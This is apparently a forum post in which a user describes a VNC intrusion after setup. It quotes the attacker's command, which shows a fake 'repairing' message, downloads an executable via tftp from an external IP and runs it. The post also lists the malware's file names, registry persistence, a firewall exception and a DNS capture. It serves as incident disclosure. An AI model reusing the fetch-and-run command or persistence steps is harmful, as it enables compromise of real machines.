I setup VNC today to run so I could access my Email, and not 15 minutes afterwards I saw my mouse start moving and a dos window pop up.

I yanked my network cable, and then shut down my modem. This is what I found (i've added spaces to make sure it's not accidentally executed):

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 83.21 7.113.2 07 GET gefgl.exe & start gefgl&

Found gefgl in my windows/system32....a nice file called a.exe, iaxcfg32.dll, and a run command in the registry linked to a.exe called MSMSGR....hell it even added itself to the list of allowed programs in windows firewall as you can see here:

SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List :*:Enabled:WADPXA32

Here's a link to a good breakdown, I saw the same kind of out put in etherreal that she saw, my ethereal captures, shortly there after I renamed all the exe files, and deleted the registry bits....

No. Time Source Destination Protocol Info 8 7.188722 192.168.254.100 192.168.254.254 DNS Standard query A pdfrvgteqe.ecbebpbswppnlhivbogg.com Frame 8 (95 bytes on wire, 95 bytes captured) Ethernet II, Src: Intel_02:9b:1c (00:11:11:02:9b:1c), Dst: 192.168.254.254 (00:a0:65:c8:01:28) Internet Protocol, Src: 192.168.254.100 (192.168.254.100), Dst: 192.168.254.254 (192.168.254.254) User Datagram Protocol, Src Port: 1047 (1047), Dst Port: domain (53) Domain Name System (query)

It seems that there's an exploit in the 4.1.0 release that allowed authentication without a password, and somebody out there is obviously watching for it. Even I'm surprised at how fast they caught me though.